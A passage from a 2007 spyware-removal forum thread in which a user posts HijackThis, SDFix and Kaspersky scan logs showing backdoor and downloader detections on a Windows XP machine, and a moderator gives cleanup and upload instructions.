O2 - BHO: (no name) - {F2496031-4FE4-497E-8F75-04E0A180366E} - C:\WINDOWS\System32\vtsqn.dll (file missing)
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: DAP Bar - {62999427-33FC-4baf-9C9C-BCE6BD127F08} - D:\Program Files\DAP\DAPIEBar.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O4 - HKLM\..\Run: [SMSERIAL] sm56hlpr.exe
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [DSLSTATEXE] "C:\Program Files\GlobespanVirata\Adsl\dslstat.exe" icon
O4 - HKLM\..\Run: [DSLAGENTEXE] "C:\Program Files\GlobespanVirata\Adsl\dslagent.exe"
O4 - HKLM\..\Run: [Adobe Photo Downloader] "C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe"
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [MailScan Dispatcher] "C:\Program Files\eScan\LAUNCH.EXE"
O4 - HKLM\..\Run: [eScan Updater] "C:\PROGRA~1\eScan\TRAYICOS.EXE" /App
O4 - HKLM\..\Run: [eScan Monitor] C:\PROGRA~1\eScan\AVPMWrap.EXE
O4 - HKLM\..\Run: [!AVG Anti-Spyware] "D:\Program Files\AVG Anti-Spyware 7.5\avgas.exe" /minimized
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet
O4 - HKCU\..\Run: [swg] "C:\Program Files\Google\GoogleToolbarNotifier\1.2.908.8472\GoogleToolbarNotifier.exe"
O4 - HKCU\..\Run: [Skype] "D:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [SUPERAntiSpyware] "D:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe"
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Samsung Multimedia Keyboard.lnk = ?
O8 - Extra context menu item: &Download with &DAP - D:\PROGRA~1\DAP\dapextie.htm
O8 - Extra context menu item: &Yahoo! Search - file:///C:\Program Files\Yahoo!\Common/ycsrch.htm
O8 - Extra context menu item: Advanced Email Extractor - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html
O8 - Extra context menu item: Download &all with DAP - D:\PROGRA~1\DAP\dapextie2.htm
O8 - Extra context menu item: E&xport to Microsoft Excel - res://D:\PROGRA~1\MICROS~1\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Scan link with AEE - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/link.html
O8 - Extra context menu item: Yahoo! &Dictionary - file:///C:\Program Files\Yahoo!\Common/ycdict.htm
O8 - Extra context menu item: Yahoo! &Maps - file:///C:\Program Files\Yahoo!\Common/ycmap.htm
O8 - Extra context menu item: Yahoo! &SMS - file:///C:\Program Files\Yahoo!\Common/ycsms.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: Run DAP - {669695BC-A811-4A9D-8CDF-BA8C795F261C} - D:\PROGRA~1\DAP\DAP.EXE
O9 - Extra button: (no name) - {85d1f590-48f4-11d9-9669-0800200c9a66} - %windir%\bdoscandel.exe (file missing)
O9 - Extra 'Tools' menuitem: Uninstall BitDefender Online Scanner v8 - {85d1f590-48f4-11d9-9669-0800200c9a66} - %windir%\bdoscandel.exe (file missing)
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - D:\PROGRA~1\MICROS~1\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Email Extractor - {AFA7DB99-3E4D-4396-94F8-B0B135BCB472} - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html (file missing) (HKCU)
O9 - Extra 'Tools' menuitem: Advanced Email Extractor - {AFA7DB99-3E4D-4396-94F8-B0B135BCB472} - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html (file missing) (HKCU)
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (YInstStarter Class) - C:\Program Files\Yahoo!\Common\yinsthelper.dll
O17 - HKLM\System\CCS\Services\Tcpip\..\{17BBF687-1141-4522-B007-EF63C7F4B7EE}: NameServer = 202.54.6.60,202.54.29.5
O17 - HKLM\System\CCS\Services\Tcpip\..\{7A1DA16E-B943-4E3A-A5A8-FF298FFD2041}: NameServer = 202.54.29.5 202.54.6.60
O20 - Winlogon Notify: !SASWinLogon - D:\Program Files\SUPERAntiSpyware\SASWINLO.dll
O20 - Winlogon Notify: WRNotifier - C:\WINDOWS\SYSTEM32\WRLogonNTF.dll
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\System32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: AVG Anti-Spyware Guard - Anti-Malware Development a.s. - D:\Program Files\AVG Anti-Spyware 7.5\guard.exe
O23 - Service: eScan Server-Updater (eScan-trayicos) - MicroWorld Technologies Inc. - C:\PROGRA~1\eScan\TRAYSSER.EXE
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPodService - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: eScan Monitor Service (KAVMonitorService) - Kaspersky Labs. - C:\PROGRA~1\eScan\avpm.exe
O23 - Service: MWAgent - MicroWorld Technologies Inc. - C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWASER.EXE
O23 - Service: STI Simulator - Unknown owner - C:\WINDOWS\System32\PAStiSvc.exe
O23 - Service: Webroot Spy Sweeper Engine (WebrootSpySweeperService) - Webroot Software, Inc. - C:\Program Files\Webroot\Spy Sweeper\SpySweeper.exe
Go to the top of the page
 
+Quote Post
Buchi
post Feb 11 2007, 07:00 AM
Post #14


Member
**

Group: Members
Posts: 16
Joined: 4-February 07
Member No.: 10,964
THANKS RRIDGELY, BELOW ARE THE REPORTS, PLEASE ADVISE NEXT STEP :

1) SDFix report:

SDFix: Version 1.64

Run by: Sys - Sun 02/11/2007 @ 12:19:12.87

Microsoft Windows XP [Version 5.1.2600]

Running From: C:\SDFix

Safe Mode:
Checking Services:

Name:

Path:


Restoring Windows Registry Entries
Restoring Default Hosts File


Rebooting...

Normal Mode:
Checking Files:

Below files will be copied to Backups folder then removed:

C:\WINDOWS\system32\eraseme_38347.exe - Deleted
C:\WINDOWS\system32\eraseme_46035.exe - Deleted
C:\WINDOWS\system32\eraseme_51380.exe - Deleted
C:\WINDOWS\system32\i - Deleted
C:\WINDOWS\system32\plscd.exe - Deleted
C:\WINDOWS\system32\setup_23367.exe - Deleted



ADS Check:

C:\WINDOWS\system32
No streams found.

Final Check:



Remaining Files:
---------------

Backups Folder: - C:\SDFix\backups\backups.zip


Checking For Files with Hidden Attributes :

C:\WINDOWS\system32\FC5303FB6F.sys
C:\WINDOWS\system32\KGyGaAvL.sys
C:\WINDOWS\LastGood.Tmp\INF\oem5.inf
C:\WINDOWS\LastGood.Tmp\INF\oem5.PNF

Finished

2) NEW HIJACKTHIS LOG:
Logfile of HijackThis v1.99.1
Scan saved at 12:27:02 PM, on 2/11/2007
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP1 (6.00.2800.1106)

Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\System32\Ati2evxx.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\WINDOWS\system32\spoolsv.exe
D:\Program Files\AVG Anti-Spyware 7.5\guard.exe
C:\PROGRA~1\eScan\TRAYSSER.EXE
C:\PROGRA~1\eScan\avpm.exe
C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWASER.EXE
C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWAgent.exe
C:\WINDOWS\System32\PAStiSvc.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Webroot\Spy Sweeper\SpySweeper.exe
C:\WINDOWS\system32\Ati2evxx.exe
C:\WINDOWS\Explorer.EXE
C:\WINDOWS\sm56hlpr.exe
C:\WINDOWS\RTHDCPL.EXE
C:\Program Files\GlobespanVirata\Adsl\dslstat.exe
C:\Program Files\GlobespanVirata\Adsl\dslagent.exe
C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe
C:\Program Files\Common Files\Real\Update_OB\realsched.exe
C:\PROGRA~1\eScan\TRAYICOS.EXE
C:\PROGRA~1\eScan\AVPMWrap.EXE
C:\PROGRA~1\eScan\MAILDISP.EXE
C:\PROGRA~1\ESCAN\SPOOLER.EXE
C:\PROGRA~1\eScan\MAILSCAN.EXE
C:\PROGRA~1\eScan\kavss.exe
D:\Program Files\AVG Anti-Spyware 7.5\avgas.exe
C:\WINDOWS\System32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\PROGRA~1\eScan\AvpM.exe
C:\Program Files\Google\GoogleToolbarNotifier\1.2.908.8472\GoogleToolbarNotifier.exe
C:\PROGRA~1\Yahoo!\MESSEN~1\ymsgr_tray.exe
D:\Program Files\Skype\Phone\Skype.exe
D:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe
C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
C:\HIJACKTHIS\HijackThis.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.google.co.in/
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = about:
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
R1 - HKCU\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
R1 - HKLM\Software\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com/ie
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
R1 - HKCU\Software\Microsoft\Internet Explorer\SearchURL,(Default) = http://www.google.com/search?q=%s
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
R1 - HKCU\Software\Microsoft\Internet Connection Wizard,ShellNext = iexplore
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
R3 - URLSearchHook: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - (no file)
O2 - BHO: DAPHelper Class - {0000CC75-ACF3-4cac-A0A9-DD3868E06852} - D:\Program Files\DAP\DAPBHO.dll
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: (no name) - {481E7983-1F2B-4250-951A-44E0902DF978} - (no file)
O2 - BHO: Yahoo! IE Services Button - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O2 - BHO: (no name) - {68D5CF1D-EC5C-4bdd-A9EF-F0E517565D50} - (no file)
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O2 - BHO: Google Toolbar Helper - {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\googletoolbar2.dll
O2 - BHO: (no name) - {F2496031-4FE4-497E-8F75-04E0A180366E} - C:\WINDOWS\System32\vtsqn.dll (file missing)
O3 - Toolbar: &Radio - {8E718888-423F-11D2-876E-00A0C9082467} - C:\WINDOWS\System32\msdxm.ocx
O3 - Toolbar: DAP Bar - {62999427-33FC-4baf-9C9C-BCE6BD127F08} - D:\Program Files\DAP\DAPIEBar.dll
O3 - Toolbar: &Google - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\googletoolbar2.dll
O4 - HKLM\..\Run: [SMSERIAL] sm56hlpr.exe
O4 - HKLM\..\Run: [RTHDCPL] RTHDCPL.EXE
O4 - HKLM\..\Run: [Alcmtr] ALCMTR.EXE
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKLM\..\Run: [DSLSTATEXE] "C:\Program Files\GlobespanVirata\Adsl\dslstat.exe" icon
O4 - HKLM\..\Run: [DSLAGENTEXE] "C:\Program Files\GlobespanVirata\Adsl\dslagent.exe"
O4 - HKLM\..\Run: [Adobe Photo Downloader] "C:\Program Files\Adobe\Photoshop Album Starter Edition\3.0\Apps\apdproxy.exe"
O4 - HKLM\..\Run: [TkBellExe] "C:\Program Files\Common Files\Real\Update_OB\realsched.exe" -osboot
O4 - HKLM\..\Run: [MailScan Dispatcher] "C:\Program Files\eScan\LAUNCH.EXE"
O4 - HKLM\..\Run: [eScan Updater] "C:\PROGRA~1\eScan\TRAYICOS.EXE" /App
O4 - HKLM\..\Run: [eScan Monitor] C:\PROGRA~1\eScan\AVPMWrap.EXE
O4 - HKLM\..\Run: [!AVG Anti-Spyware] "D:\Program Files\AVG Anti-Spyware 7.5\avgas.exe" /minimized
O4 - HKCU\..\Run: [ctfmon.exe] C:\WINDOWS\System32\ctfmon.exe
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\PROGRA~1\Yahoo!\MESSEN~1\YAHOOM~1.EXE" -quiet
O4 - HKCU\..\Run: [swg] "C:\Program Files\Google\GoogleToolbarNotifier\1.2.908.8472\GoogleToolbarNotifier.exe"
O4 - HKCU\..\Run: [Skype] "D:\Program Files\Skype\Phone\Skype.exe" /nosplash /minimized
O4 - HKCU\..\Run: [SUPERAntiSpyware] "D:\Program Files\SUPERAntiSpyware\SUPERAntiSpyware.exe"
O4 - Global Startup: Adobe Gamma Loader.lnk = C:\Program Files\Common Files\Adobe\Calibration\Adobe Gamma Loader.exe
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Acrobat 7.0\Reader\reader_sl.exe
O4 - Global Startup: Samsung Multimedia Keyboard.lnk = ?
O8 - Extra context menu item: &Download with &DAP - D:\PROGRA~1\DAP\dapextie.htm
O8 - Extra context menu item: &Yahoo! Search - file:///C:\Program Files\Yahoo!\Common/ycsrch.htm
O8 - Extra context menu item: Advanced Email Extractor - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html
O8 - Extra context menu item: Download &all with DAP - D:\PROGRA~1\DAP\dapextie2.htm
O8 - Extra context menu item: E&xport to Microsoft Excel - res://D:\PROGRA~1\MICROS~1\OFFICE11\EXCEL.EXE/3000
O8 - Extra context menu item: Scan link with AEE - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/link.html
O8 - Extra context menu item: Yahoo! &Dictionary - file:///C:\Program Files\Yahoo!\Common/ycdict.htm
O8 - Extra context menu item: Yahoo! &Maps - file:///C:\Program Files\Yahoo!\Common/ycmap.htm
O8 - Extra context menu item: Yahoo! &SMS - file:///C:\Program Files\Yahoo!\Common/ycsms.htm
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.5.0_08\bin\ssv.dll
O9 - Extra button: Yahoo! Services - {5BAB4B5B-68BC-4B02-94D6-2FC0DE4A7897} - C:\Program Files\Yahoo!\Common\yiesrvc.dll
O9 - Extra button: Run DAP - {669695BC-A811-4A9D-8CDF-BA8C795F261C} - D:\PROGRA~1\DAP\DAP.EXE
O9 - Extra button: (no name) - {85d1f590-48f4-11d9-9669-0800200c9a66} - %windir%\bdoscandel.exe (file missing)
O9 - Extra 'Tools' menuitem: Uninstall BitDefender Online Scanner v8 - {85d1f590-48f4-11d9-9669-0800200c9a66} - %windir%\bdoscandel.exe (file missing)
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - D:\PROGRA~1\MICROS~1\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Email Extractor - {AFA7DB99-3E4D-4396-94F8-B0B135BCB472} - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html (file missing) (HKCU)
O9 - Extra 'Tools' menuitem: Advanced Email Extractor - {AFA7DB99-3E4D-4396-94F8-B0B135BCB472} - res://D:\Program%20Files\Advanced%20Email%20Extractor\AeeMsie.dll/page.html (file missing) (HKCU)
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O10 - Unknown file in Winsock LSP: c:\windows\system32\mwtsp.dll
O16 - DPF: {30528230-99f7-4bb4-88d8-fa1d4f56a2ab} (YInstStarter Class) - C:\Program Files\Yahoo!\Common\yinsthelper.dll
O17 - HKLM\System\CCS\Services\Tcpip\..\{17BBF687-1141-4522-B007-EF63C7F4B7EE}: NameServer = 202.54.6.60,202.54.29.5
O17 - HKLM\System\CCS\Services\Tcpip\..\{7A1DA16E-B943-4E3A-A5A8-FF298FFD2041}: NameServer = 202.54.29.5 202.54.6.60
O20 - Winlogon Notify: !SASWinLogon - D:\Program Files\SUPERAntiSpyware\SASWINLO.dll
O20 - Winlogon Notify: WRNotifier - C:\WINDOWS\SYSTEM32\WRLogonNTF.dll
O23 - Service: Ati HotKey Poller - ATI Technologies Inc. - C:\WINDOWS\System32\Ati2evxx.exe
O23 - Service: ATI Smart - Unknown owner - C:\WINDOWS\system32\ati2sgag.exe
O23 - Service: AVG Anti-Spyware Guard - Anti-Malware Development a.s. - D:\Program Files\AVG Anti-Spyware 7.5\guard.exe
O23 - Service: eScan Server-Updater (eScan-trayicos) - MicroWorld Technologies Inc. - C:\PROGRA~1\eScan\TRAYSSER.EXE
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\11\Intel 32\IDriverT.exe
O23 - Service: iPodService - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: eScan Monitor Service (KAVMonitorService) - Kaspersky Labs. - C:\PROGRA~1\eScan\avpm.exe
O23 - Service: MWAgent - MicroWorld Technologies Inc. - C:\PROGRA~1\COMMON~1\MICROW~1\Agent\MWASER.EXE
O23 - Service: STI Simulator - Unknown owner - C:\WINDOWS\System32\PAStiSvc.exe
O23 - Service: Webroot Spy Sweeper Engine (WebrootSpySweeperService) - Webroot Software, Inc. - C:\Program Files\Webroot\Spy Sweeper\SpySweeper.exe
Go to the top of the page
 
+Quote Post
rridgely
post Feb 11 2007, 04:52 PM
Post #15


I hate computers
Group Icon

Group: Moderators
Posts: 8,645
Joined: 12-April 05
Member No.: 1,352
Next please visit SpyKillers forum here

http://www.thespykiller.co.uk/forum/index.php?board=1.0

Read the instructions for uploading files which is the first topic on the forum then start a new Topic named 'Files From CCleaners Forum' , please then post a link to this thread and upload the SDFix backups folder which is located here:

C:\SDFix\backups\backups.zip

Once they are uploaded you can delete the C:\SDFix folder to remove the infected backups from your system

---------

Run Kaspersky WebScanner
  • Please go HERE and click Kaspersky Online Scanner
  • Read and Accept the Agreement
  • You will be promted to install an ActiveX component from Kaspersky, Click Yes.
  • If you see a Windows dialog asking if you want to install this software, click the Install button.
  • The program will launch and then begin downloading the latest definition files,
  • When the "Update progress" line changes to "Ready" and the "NEXT ->" button becomes available, please click on it.
  • Click on the Scan Settings button, and in the next window select the Extended database, and click Ok.
  • Under "Please select a target to scan:", click My Computer to start the scan.
  • When the scan is finished, click the "Save as Text" button, and save the file as kavscan.txt to your Desktop, close the Kaspersky On-line Scanner window.
  • Paste kaspersky log onto forum.


--------------------
Having problems with spyware and viruses? If so then please follow the Spyware Removal Guide

Want to know how to protect your clean computer from viruses and spyware? The please follow the Malware Prevention Guide

Looking for good free security software?(or other great free stuff) The please take a look at the Recommended Security Applications Guide
Go to the top of the page
 
+Quote Post
Buchi
post Feb 12 2007, 12:43 PM
Post #16


Member
**

Group: Members
Posts: 16
Joined: 4-February 07
Member No.: 10,964
THANKS RRIDGELY, BELOW ARE THE REPORTS:
PLEASE STUDY AND REVERT ME THE NEXT STEP.

1) LINK FOR THE SDFIX UPLOAD FILE:
http://www.thespykiller.co.uk/forum/index....mp;topic=3599.0

2) KAVSCAN.TXT FILE:
-------------------------------------------------------------------------------
KASPERSKY ONLINE SCANNER REPORT
Monday, February 12, 2007 5:54:43 PM
Operating System: Microsoft Windows XP Professional, Service Pack 2 (Build 2600)
Kaspersky Online Scanner version: 5.0.83.0
Kaspersky Anti-Virus database last update: 12/02/2007
Kaspersky Anti-Virus database records: 267015
-------------------------------------------------------------------------------

Scan Settings:
Scan using the following antivirus database: extended
Scan Archives: true
Scan Mail Bases: true

Scan Target - My Computer:
A:\
C:\
D:\
E:\
F:\
G:\

Scan Statistics:
Total number of scanned objects: 71641
Number of viruses found: 7
Number of infected objects: 34 / 0
Number of suspicious objects: 0
Duration of the scan process: 00:34:49

Infected Object Name / Virus Name / Last Action
C:\Documents and Settings\LocalService\Cookies\index.dat Object is locked skipped
C:\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat Object is locked skipped
C:\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat.LOG Object is locked skipped
C:\Documents and Settings\LocalService\Local Settings\History\History.IE5\index.dat Object is locked skipped
C:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\index.dat Object is locked skipped
C:\Documents and Settings\LocalService\NTUSER.DAT Object is locked skipped
C:\Documents and Settings\LocalService\ntuser.dat.LOG Object is locked skipped
C:\Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat Object is locked skipped
C:\Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat.LOG Object is locked skipped
C:\Documents and Settings\NetworkService\NTUSER.DAT Object is locked skipped
C:\Documents and Settings\NetworkService\ntuser.dat.LOG Object is locked skipped
C:\Documents and Settings\Sys\Application Data\SUPERAntiSpyware.com\SUPERAntiSpyware\SUPERANTISPYWARE.LOG Object is locked skipped
C:\Documents and Settings\Sys\Cookies\index.dat Object is locked skipped
C:\Documents and Settings\Sys\Desktop\BMK\SmitfraudFix\SmitfraudFix.exe/data.rar/SmitfraudFix/Reboot.exe Infected: not-a-virus:RiskTool.Win32.Reboot.f skipped
C:\Documents and Settings\Sys\Desktop\BMK\SmitfraudFix\SmitfraudFix.exe/data.rar Infected: not-a-virus:RiskTool.Win32.Reboot.f skipped
C:\Documents and Settings\Sys\Desktop\BMK\SmitfraudFix\SmitfraudFix.exe RarSFX: infected - 2 skipped
C:\Documents and Settings\Sys\Desktop\BMK\SmitfraudFix\SmitfraudFix.exe PE_Patch.UPX: infected - 2 skipped
C:\Documents and Settings\Sys\Desktop\SPYWARE\SmitfraudFix.exe/data.rar/SmitfraudFix/Reboot.exe Infected: not-a-virus:RiskTool.Win32.Reboot.f skipped
C:\Documents and Settings\Sys\Desktop\SPYWARE\SmitfraudFix.exe/data.rar Infected: not-a-virus:RiskTool.Win32.Reboot.f skipped
C:\Documents and Settings\Sys\Desktop\SPYWARE\SmitfraudFix.exe RarSFX: infected - 2 skipped
C:\Documents and Settings\Sys\Desktop\SPYWARE\SmitfraudFix.exe PE_Patch.UPX: infected - 2 skipped
C:\Documents and Settings\Sys\Desktop\SPYWARE\SmitfraudFix.zip/SmitfraudFix/Reboot.exe Infected: not-a-virus:RiskTool.Win32.Reboot.f skipped
C:\Documents and Settings\Sys\Desktop\SPYWARE\SmitfraudFix.zip ZIP: infected - 1 skipped
C:\Documents and Settings\Sys\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat Object is locked skipped
C:\Documents and Settings\Sys\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat.LOG Object is locked skipped
C:\Documents and Settings\Sys\Local Settings\History\History.IE5\index.dat Object is locked skipped
C:\Documents and Settings\Sys\Local Settings\History\History.IE5\MSHist012007021220070213\index.dat Object is locked skipped
C:\Documents and Settings\Sys\Local Settings\Temporary Internet Files\Content.IE5\index.dat Object is locked skipped
C:\Documents and Settings\Sys\NTUSER.DAT Object is locked skipped
C:\Documents and Settings\Sys\ntuser.dat.LOG Object is locked skipped
C:\Program Files\eScan\MAILDISP.LCK Object is locked skipped
C:\Program Files\eScan\MAILDSP1.LCK Object is locked skipped
C:\Program Files\eScan\SPOOLER.LCK Object is locked skipped
C:\RECYCLER\S-1-5-21-1085031214-823518204-839522115-1003\Dc9\backups\backups.zip/backups/i Infected: Trojan-Downloader.BAT.Ftp.ab skipped
C:\RECYCLER\S-1-5-21-1085031214-823518204-839522115-1003\Dc9\backups\backups.zip ZIP: infected - 1 skipped
C:\System Volume Information\_restore{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP211\A0052115.exe Infected: Backdoor.Win32.SdBot.beb skipped
C:\System Volume Information\_restore{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP211\A0052116.exe Infected: Backdoor.Win32.SdBot.beb skipped
C:\System Volume Information\_restore{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP211\A0052119.exe Infected: Backdoor.Win32.SdBot.beb skipped
C:\System Volume Information\_restore{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP211\A0052156.exe Infected: Backdoor.Win32.SdBot.beb skipped
C:\System Volume Information\_restore{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053390.exe Infected: Backdoor.Win32.SdBot.beb skipped
C:\System Volume Information\_restore{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053405.exe Infected: Backdoor.Win32.SdBot.beb skipped
C:\System Volume Information\_restore{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053420.exe Infected: Backdoor.Win32.SdBot.beb skipped
C:\System Volume Information\_restore{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053467.exe Infected: Backdoor.Win32.SdBot.beb skipped
C:\System Volume Information\_restore{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053498.exe Infected: Backdoor.Win32.SdBot.beb skipped
C:\System Volume Information\_restore{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053531.exe Infected: Backdoor.Win32.SdBot.beb skipped
C:\System Volume Information\_restore{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053553.exe Infected: Backdoor.Win32.SdBot.beb skipped
C:\System Volume Information\_restore{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053569.exe Infected: Backdoor.Win32.SdBot.beb skipped
C:\System Volume Information\_restore{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053586.exe Infected: Backdoor.Win32.SdBot.beb skipped
C:\System Volume Information\_restore{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053603.exe Infected: Backdoor.Win32.SdBot.beb skipped
C:\System Volume Information\_restore{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP212\A0053647.exe Infected: Backdoor.Win32.SdBot.beb skipped
C:\System Volume Information\_restore{29EE322D-54E6-4C49-A602-D1B0725333CD}\RP217\change.log Object is locked skipped
C:\WINDOWS\Debug\oakley.log Object is locked skipped
C:\WINDOWS\Debug\PASSWD.LOG Object is locked skipped
C:\WINDOWS\SchedLgU.Txt Object is locked skipped
